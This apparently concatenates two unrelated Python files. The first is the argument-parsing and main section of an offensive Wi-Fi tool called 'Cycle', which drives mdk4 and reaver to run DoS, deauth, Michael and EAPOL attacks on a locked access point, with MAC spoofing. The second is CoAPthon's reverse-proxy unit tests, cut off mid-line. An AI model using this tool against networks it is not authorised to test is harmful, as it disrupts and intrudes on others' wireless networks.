default='wlan0mon', help='the interface to use in attacks (default: wlan0mon)') parser.add_argument('-v', '--verbose', action='store_true', help='show (and log) more detailed output') parser.add_argument('-s', '--spoof-mac', action='store_true', help='use a spoofed MAC (random if -m not provided)') parser.add_argument('-m', '--mac-address', type=str, help='the fake MAC to use with -s') parser.add_argument('-1', '--dos', action='store_true', help='run DoS attacks when AP locked') parser.add_argument('-2', '--deauth', action='store_true', help='run deauth attacks when AP locked') parser.add_argument('-3', '--michael', action='store_true', help='run Michael attacks when AP locked') parser.add_argument('-4', '--eapol', action='store_true', help='run EAPOL attacks when AP locked') parser.add_argument('-9', '--random-attacks', metavar='MINS', type=int, help='cycle through random attacks at this set interval (mins)') return parser.parse_args() def check_requirements(): requirements = ['mdk4', 'reaver', 'wash', 'macchanger'] for r in requirements: req_exists = which(r) if req_exists: logger.debug(f'{r} found') else: logger.error(f'{r} missing - please install before running Cycle') return False return True def configure_logging(verbose, bssid: str): logger_format = '<green>{time:HH:mm:ss}</green> | <level>{level: <8}</level> | <level>{message}</level>' logger.remove() logger_level = ('DEBUG' if verbose else 'INFO') logger.add(sys.stderr, format=logger_format, level=logger_level) bssid_string = f'_{bssid}' if bssid else '' logger.add(f'cycle_logs/cycle_{{time:YYYY-MM-DD_HH-mm-ss}}{bssid_string.replace(":", "-")}.log', format='{time} | {level} | {message}', level=logger_level, rotation='100 MB') def main(): args = process_args() configure_logging(args.verbose, args.bssid) if check_requirements(): any_attacks = args.dos or args.deauth or args.michael or args.eapol attack_dos = args.dos if any_attacks else True if attack_dos: logger.info('DoS attack selected') attack_deauth = args.deauth if any_attacks else False if attack_deauth: logger.info('Deauth attack selected') attack_michael = args.michael if any_attacks else False if attack_michael: logger.info('Michael attack selected') attack_eapol = args.eapol if any_attacks else False if attack_eapol: logger.info('EAPOL attack selected') attacks = {'dos': attack_dos, 'deauth': attack_deauth, 'michael': attack_michael, 'eapol': attack_eapol} run_cycle(args.bssid, args.wait_time, args.channel, 5, args.interface, not args.send_nacks, args.small, (args.spoof_mac, args.mac_address), attacks) if __name__ == '__main__': main()
coverage_test_reverse_proxy.py
# -*- coding: utf-8 -*- from queue import Queue import random import socket import threading import unittest from coapclient import HelperClient from coapreverseproxy import CoAPReverseProxy from coapserver import CoAPServer from coapthon import defines from coapthon.messages.option import Option from coapthon.messages.request import Request from coapthon.messages.response import Response from coapthon.serializer import Serializer __author__ = 'Giacomo Tanganelli' __version__ = "2.0" class Tests(unittest.TestCase): def setUp(self): self.server_address = ("127.0.0.1", 5683) self.current_mid = random.randint(1, 1000) self.server_mid = random.randint(1000, 2000) self.server = CoAPServer("127.0.0.1", 5684) self.server_thread = threading.Thread(target=self.server.listen, args=(1,)) self.server_thread.start() self.proxy = CoAPReverseProxy("127.0.0.1", 5683, "reverse_proxy_mapping.xml") self.proxy_thread = threading.Thread(target=self.proxy.listen, args=(1,)) self.proxy_thread.start() self.queue = Queue() def tearDown(self): self.proxy.close() self.proxy_thread.join(timeout=25) self.proxy = None self.server.close() self.server_thread.join(timeout=25) self.server = None def _test_with_client(self, message_list): # pragma: no cover client = HelperClient(self.server_address) for message, expected in message_list: if message is not None: received_message = client.send_request(message) if expected is not None: if expected.type is not None: self.assertEqual(received_message.type, expected.type) if expected.mid is not None: self.assertEqual(received_message.mid, expected.mid) self.assertEqual(received_message.code, expected.code) if expected.source is not None: self.assertEqual(received_message.source, self.server_address) if expected.token is not None: self.assertEqual(received_message.token, expected.token) if expected.payload is not None: self.assertEqual(received_message.payload, expected.payload) if expected.options: self.assertEqual(len(received_message.options), len(expected.options)) for o in expected.options: assert isinstance(o, Option) option_value = getattr(expected, o.name.lower().replace("-", "_")) option_value_rec = getattr(received_message, o.name.lower().replace("-", "_")) self.assertEqual(option_value, option_value_rec) client.stop() def _test_with_client_observe(self, message_list): # pragma: no cover client = HelperClient(self.server_address) for message, expected in message_list: if message is not None: client.send_request(message, self.client_callback) if expected is not None: received_message = self.queue.get() if expected.type is not None: self.assertEqual(received_message.type, expected.type) if expected.mid is not None: self.assertEqual(received_message.mid, expected.mid) self.assertEqual(received_message.code, expected.code) if expected.source is not None: self.assertEqual(received_message.source, self.server_address) if expected.token is not None: self.assertEqual(received_message.token, expected.token) if expected.payload is not None: self.assertEqual(received_message.payload, expected.payload) if expected.options: self.assertEqual(len(received_message.options), len(expected.options)) for o in expected.options: assert isinstance(o, Option) option_value = getattr(expected, o.name.lower().replace("-", "_")) option_value_rec = getattr(received_message, o.name.lower().replace("-", "_")) self.assertEqual(option_value, option_value_rec) client.stop() def client_callback(self, response): # pragma: no cover print("Callback") self.queue.put(response) def _test_plugtest(self, message_list): # pragma: no cover serializer = Serializer() sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) for message, expected in message_list: if message is not None: datagram = serializer.serialize(message) sock.sendto(datagram, message.destination) if expected is not None: datagram, source = sock.recvfrom(4096) received_message = serializer.deserialize(datagram, source) if expected.type is not None: self.assertEqual(received_message.type, expected.type) if expected.mid is not None: self.assertEqual(received_message.mid, expected.mid) self.assertEqual(received_message.code, expected.code) if expected.source is not None: self.assertEqual(received_message.source, source) if expected.token is not None: self.assertEqual(received_message.token, expected.token) if expected.payload is not None: self.assertEqual(received_message.payload, expected.payload) if expected.options is not None: self.assertEqual(received_message.options, expected.options) for o in expected.options: assert isinstance(o, Option) option_value = getattr(expected, o.name.lower().replace("-", "_")) option_value_rec = getattr(received_message, o.name.lower().replace("-", "_")) self.assertEqual(option_value, option_value_rec) sock.close() def _test_datagram(self, message_list): # pragma: no cover serializer = Serializer() sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) for message, expected in message_list: if message is not None: datagram, destination = message sock.sendto(datagram, destination) if expected is not None: datagram, source = sock.recvfrom(4096) received_message = serializer.deserialize(datagram, source) if expected.type is not None: self.assertEqual(received_message.type, expected.type) if expected.mid is not None: self.assertEqual(received_message.mid, expected.mid) self.assertEqual(received_message.code, expected.code) if expected.source is not None: self.assertEqual(received_message.source, source) if expected.token is not None: self.assertEqual(received_message.token, expected.token) if expected.payload is not None: self.assertEqual(received_message.payload, expected.payload) if expected.options is not None: self.assertEqual(received_message.options, expected.options) for o in expected.options: assert isinstance(o, Option) option_value = getattr(expected, o.name.lower().replace("-", "_")) option_value_rec = getattr(received_message, o.name.lower().replace("-", "_")) self.assertEqual(option_value, option_value_rec) sock.close() def test_get_reverse(self): print("TEST_GET_REVERSE") path = "/Server1/basic" req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CONTENT.number expected.token = None expected.payload = "Basic Resource" exchange1 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CREATED.number expected.token = None exchange2 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.PUT.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CHANGED.number expected.token = None exchange3 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.DELETE.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.DELETED.number expected.token = None exchange4 = (req, expected) self.current_mid += 1 self._test_with_client([exchange1, exchange2, exchange3, exchange4]) def test_separate(self): print("TEST_SEPARATE") path = "/Server1/separate" req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address expected = Response() expected.type = defines.Types["CON"] expected._mid = None expected.code = defines.Codes.CONTENT.number expected.token = None expected.max_age = 60 exchange1 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "POST" expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CHANGED.number expected.token = None expected.options = None exchange2 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.PUT.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "PUT" expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CHANGED.number expected.token = None expected.options = None exchange3 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.DELETE.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.DELETED.number expected.token = None exchange4 = (req, expected) self.current_mid += 1 self._test_with_client([exchange1, exchange2, exchange3, exchange4]) def test_post(self): print("TEST_POST") path = "/Server1/storage/new_res?id=1" req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "test" req.add_if_none_match() expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CREATED.number expected.token = None expected.payload = None expected.location_path = "Server1/storage/new_res" expected.location_query = "id=1" exchange1 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.GET.number req.uri_path = "/Server1/storage/new_res" req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.if_match = ["test", "not"] expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CONTENT.number expected.token = None expected.payload = "test" exchange2 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.PUT.number req.uri_path = "/Server1/storage/new_res" req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.if_match = ["not"] req.payload = "not" expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.PRECONDITION_FAILED.number expected.token = None exchange3 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.POST.number req.uri_path = "/Server1/storage/new_res" req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.if_match = ["not"] req.payload = "not" expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.PRECONDITION_FAILED.number expected.token = None exchange4 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.PUT.number req.uri_path = "/Server1/storage/new_res" req._mid = self.current_mid req.destination = self.server_address req.add_if_none_match() req.payload = "not" expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.PRECONDITION_FAILED.number expected.token = None exchange5 = (req, expected) self.current_mid += 1 self._test_with_client([exchange1, exchange2, exchange3, exchange4, exchange5]) def test_post_block(self): print("TEST_POST_BLOCK") path = "/Server1/storage/new_res" req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras sollicitudin fermentum ornare. " \ "Cras accumsan tellus quis dui lacinia eleifend. Proin ultrices rutrum orci vitae luctus. " \ "Nullam malesuada pretium elit, at aliquam odio vehicula in. Etiam nec maximus elit. " \ "Etiam at erat ac ex ornare feugiat. Curabitur sed malesuada orci, id aliquet nunc. Phasellus " \ "nec leo luctus, blandit lorem sit amet, interdum metus. Duis efficitur volutpat magna, ac " \ "ultricies nibh aliquet sit amet. Etiam tempor egestas augue in hendrerit. Nunc eget augue " \ "ultricies, dignissim lacus et, vulputate dolor. Nulla eros odio, fringilla vel massa ut, " \ "facilisis cursus quam. Fusce faucibus lobortis congue. Fusce consectetur porta neque, id " \ "sollicitudin velit maximus eu. Sed pharetra leo quam, vel finibus turpis cursus ac. " \ "Aenean ac nisi massa. Cras commodo arcu nec ante tristique ullamcorper. Quisque eu hendrerit" \ " urna. Cras fringilla eros ut nunc maximus, non porta nisl mollis. Aliquam in rutrum massa." \ " Praesent tristique turpis dui, at ultri" req.block1 = (1, 1, 1024) expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.REQUEST_ENTITY_INCOMPLETE.number expected.token = None expected.payload = None exchange1 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras sollicitudin fermentum ornare. " \ "Cras accumsan tellus quis dui lacinia eleifend. Proin ultrices rutrum orci vitae luctus. " \ "Nullam malesuada pretium elit, at aliquam odio vehicula in. Etiam nec maximus elit. " \ "Etiam at erat ac ex ornare feugiat. Curabitur sed malesuada orci, id aliquet nunc. Phasellus " \ "nec leo luctus, blandit lorem sit amet, interdum metus. Duis efficitur volutpat magna, ac " \ "ultricies nibh aliquet sit amet. Etiam tempor egestas augue in hendrerit. Nunc eget augue " \ "ultricies, dignissim lacus et, vulputate dolor. Nulla eros odio, fringilla vel massa ut, " \ "facilisis cursus quam. Fusce faucibus lobortis congue. Fusce consectetur porta neque, id " \ "sollicitudin velit maximus eu. Sed pharetra leo quam, vel finibus turpis cursus ac. " \ "Aenean ac nisi massa. Cras commodo arcu nec ante tristique ullamcorper. Quisque eu hendrerit" \ " urna. Cras fringilla eros ut nunc maximus, non porta nisl mollis. Aliquam in rutrum massa." \ " Praesent tristique turpis dui, at ultri" req.block1 = (0, 1, 1024) expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CONTINUE.number expected.token = None expected.payload = None expected.block1 = (0, 1, 1024) exchange2 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "a imperdiet nisl. Quisque a iaculis libero, id tempus lacus. Aenean convallis est non justo " \ "consectetur, a hendrerit enim consequat. In accumsan ante a egestas luctus. Etiam quis neque " \ "nec eros vestibulum faucibus. Nunc viverra ipsum lectus, vel scelerisque dui dictum a. Ut orci " \ "enim, ultrices a ultrices nec, pharetra in quam. Donec accumsan sit amet eros eget fermentum." req.block1 = (1, 1, 64) expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CONTINUE.number expected.token = None expected.payload = None expected.block1 = (1, 1, 64) exchange3 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "a imperdiet nisl. Quisque a iaculis libero, id tempus lacus. Aenean convallis est non justo " \ "consectetur, a hendrerit enim consequat. In accumsan ante a egestas luctus. Etiam quis neque " \ "nec eros vestibulum faucibus. Nunc viverra ipsum lectus, vel scelerisque dui dictum a. Ut orci " \ "enim, ultrices a ultrices nec, pharetra in quam. Donec accumsan sit amet eros eget fermentum." req.block1 = (3, 1, 64) expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.REQUEST_ENTITY_INCOMPLETE.number expected.token = None expected.payload = None exchange4 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "a imperdiet nisl. Quisque a iaculis libero, id tempus lacus. Aenean convallis est non justo " \ "consectetur, a hendrerit enim consequat. In accumsan ante a egestas luctus. Etiam quis neque " \ "nec eros vestibulum faucibus. Nunc viverra ipsum lectus, vel scelerisque dui dictum a. Ut orci " \ "enim, ultrices a ultrices nec, pharetra in quam. Donec accumsan sit amet eros eget fermentum." req.block1 = (2, 0, 64) expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CREATED.number expected.token = None expected.payload = None expected.location_path = "Server1/storage/new_res" exchange5 = (req, expected) self.current_mid += 1 self._test_plugtest([exchange1, exchange2, exchange3, exchange4, exchange5]) def test_get_block(self): print("TEST_GET_BLOCK") path = "/Server1/big" req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = None req.block2 = (0, 0, 512) expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CONTENT.number expected.token = None expected.payload = None expected.block2 = (0, 1, 512) expected.size2 = 2041 exchange1 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = None req.block2 = (1, 0, 256) expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CONTENT.number expected.token = None expected.payload = None expected.block2 = (1, 1, 256) expected.size2 = 2041 exchange2 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = None req.block2 = (2, 0, 128) expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CONTENT.number expected.token = None expected.payload = None expected.block2 = (2, 1, 128) expected.size2 = 2041 exchange3 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = None req.block2 = (3, 0, 64) expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CONTENT.number expected.token = None expected.payload = None expected.block2 = (3, 1, 64) expected.size2 = 2041 exchange4 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = None req.block2 = (4, 0, 32) expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CONTENT.number expected.token = None expected.payload = None expected.block2 = (4, 1, 32) expected.size2 = 2041 exchange5 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = None req.block2 = (5, 0, 16) expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CONTENT.number expected.token = None expected.payload = None expected.block2 = (5, 1, 16) expected.size2 = 2041 exchange6 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = None req.block2 = (6, 0, 1024) expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CONTENT.number expected.token = None expected.payload = None expected.block2 = (6, 0, 1024) expected.size2 = 2041 exchange7 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = None req.block2 = (7, 0, 1024) expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CONTENT.number expected.token = None expected.payload = None expected.block2 = (7, 0, 1024) expected.size2 = 2041 exchange8 = (req, expected) self.current_mid += 1 self._test_plugtest([exchange1, exchange2, exchange3, exchange4, exchange5, exchange6, exchange7, exchange8]) def test_post_block_big(self): print("TEST_POST_BLOCK_BIG") path = "/Server1/big" req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "Lorem ipsum dolo" req.block1 = (0, 1, 16) expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CONTINUE.number expected.token = None expected.payload = None expected.block1 = (0, 1, 16) exchange1 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "r sit amet, consectetur adipisci" req.block1 = (1, 1, 32) expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CONTINUE.number expected.token = None expected.payload = None expected.block1 = (1, 1, 32) exchange2 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "ng elit. Sed ut ultrices ligula. Pellentesque purus augue, cursu" req.block1 = (2, 1, 64) expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CONTINUE.number expected.token = None expected.payload = None expected.block1 = (2, 1, 64) exchange3 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "s ultricies est in, vehicula congue metus. Vestibulum vel justo lacinia, porttitor quam vitae, " \ "feugiat sapien. Quisque finibus, " req.block1 = (3, 1, 128) expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CONTINUE.number expected.token = None expected.payload = None expected.block1 = (3, 1, 128) exchange4 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "nisi vitae rhoncus malesuada, augue mauris dapibus tellus, sit amet venenatis libero" \ " libero sed lorem. In pharetra turpis sed eros porta mollis. Quisque dictum dolor nisl," \ " imperdiet tincidunt augue malesuada vitae. Donec non felis urna. Suspendisse at hend" req.block1 = (4, 1, 256) expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CONTINUE.number expected.token = None expected.payload = None expected.block1 = (4, 1, 256) exchange5 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "rerit ex, quis aliquet ante. Vivamus ultrices dolor at elit tincidunt, eget fringilla " \ "ligula vestibulum. In molestie sagittis nibh, ut efficitur tellus faucibus non. Maecenas " \ "posuere elementum faucibus. Morbi nisi diam, molestie non feugiat et, elementum eget magna." \ " Donec vel sem facilisis quam viverra ultrices nec eu lacus. Sed molestie nisi id ultrices " \ "interdum. Curabitur pharetra sed tellus in dignissim. Duis placerat aliquam metus, volutpat " \ "elementum augue aliquam a. Nunc sed dolor at orci maximus portt" req.block1 = (5, 1, 512) expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CONTINUE.number expected.token = None expected.payload = None expected.block1 = (5, 1, 512) exchange6 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "itor ac sit amet eros. Mauris et nisi in tortor pharetra rhoncus sit amet hendrerit metus. " \ "Integer laoreet placerat cursus. Nam a nulla ex. Donec laoreet sagittis libero quis " \ "imperdiet. Vivamus facilisis turpis nec rhoncus venenatis. Duis pulvinar tellus vel quam " \ "maximus imperdiet. Mauris eget nibh orci. Duis ut cursus nibh. Nulla sed commodo elit. " \ "Suspendisse ac eros lacinia, mattis turpis at, porttitor justo. Vivamus molestie " \ "tincidunt libero. Etiam porttitor lacus odio, at lobortis tortor scelerisque nec. " \ "Nullam non ante vel nisi ultrices consectetur. Maecenas massa felis, tempor eget " \ "malesuada eget, pretium eu sapien. Vivamus dapibus ante erat, non faucibus orci sodales " \ "sit amet. Cras magna felis, sodales eget magna sed, eleifend rutrum ligula. Vivamus interdum " \ "enim enim, eu facilisis tortor dignissim quis. Ut metus nulla, mattis non lorem et, " \ "elementum ultrices orci. Quisque eleifend, arcu vitae ullamcorper pulvinar, ipsum ex " \ "sodales arcu, eget consectetur mauris metus ac tortor. Donec id sem felis. Maur" req.block1 = (6, 0, 1024) expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CHANGED.number expected.token = None expected.payload = None exchange7 = (req, expected) self.current_mid += 1 self._test_plugtest([exchange1, exchange2, exchange3, exchange4, exchange5, exchange6, exchange7]) def test_options(self): print("TEST_OPTIONS") path = "/Server1/storage/new_res" req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address option = Option() option.number = defines.OptionRegistry.ETAG.number option.value = "test" req.add_option(option) req.del_option(option) req.payload = "test" expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CREATED.number expected.token = None expected.payload = None expected.location_path = "Server1/storage/new_res" exchange1 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address option = Option() option.number = defines.OptionRegistry.ETAG.number option.value = "test" req.add_option(option) req.del_option_by_name("ETag") req.payload = "test" expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CREATED.number expected.token = None expected.payload = None expected.location_path = "Server1/storage/new_res" exchange2 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address option = Option() option.number = defines.OptionRegistry.ETAG.number option.value = "test" req.add_option(option) del req.etag req.payload = "test" expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CREATED.number expected.token = None expected.payload = None expected.location_path = "Server1/storage/new_res" exchange3 = (req, expected) self.current_mid += 1 self._test_with_client([exchange1, exchange2, exchange3]) def test_content_type(self): print("TEST_CONTENT_TYPE") path = "/Server1/storage/new_res" req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "<value>test</value>" req.content_type = defines.Content_types["application/xml"] expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CREATED.number expected.token = None expected.payload = None expected.location_path = "Server1/storage/new_res" exchange1 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CONTENT.number expected.token = None expected.payload = "Basic Resource" exchange2 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.PUT.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "test" expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CHANGED.number expected.token = None expected.payload = None exchange3 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CONTENT.number expected.token = None expected.payload = "test" exchange4 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.accept = defines.Content_types["application/xml"] expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CONTENT.number expected.token = None expected.payload = "<value>test</value>" exchange5 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.accept = defines.Content_types["application/json"] expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.NOT_ACCEPTABLE.number expected.token = None expected.payload = None # expected.content_type = defines.Content_types["application/json"] exchange6 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.GET.number req.uri_path = "/Server1/xml" req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CONTENT.number expected.token = None expected.payload = "<value>0</value>" expected.content_type = defines.Content_types["application/xml"] exchange7 = (req, expected) self.current_mid += 1 self._test_with_client([exchange1, exchange2, exchange3, exchange4, exchange5, exchange6, exchange7]) def test_ETAG(self): print("TEST_ETAG") path = "/Server1/etag" req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CONTENT.number expected.token = None expected.payload = "ETag resource" expected.etag = "0" exchange1 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "test" expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CHANGED.number expected.token = None expected.payload = None expected.etag = "1" exchange2 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.etag = "1" expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.VALID.number expected.token = None expected.payload = None expected.etag = "1" exchange3 = (req, expected) self.current_mid += 1 self._test_with_client([exchange1, exchange2, exchange3]) def test_child(self): print("TEST_CHILD") path = "/Server1/child" req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "test" expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CREATED.number expected.token = None expected.payload = None expected.location_path = "Server1/child" exchange1 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = 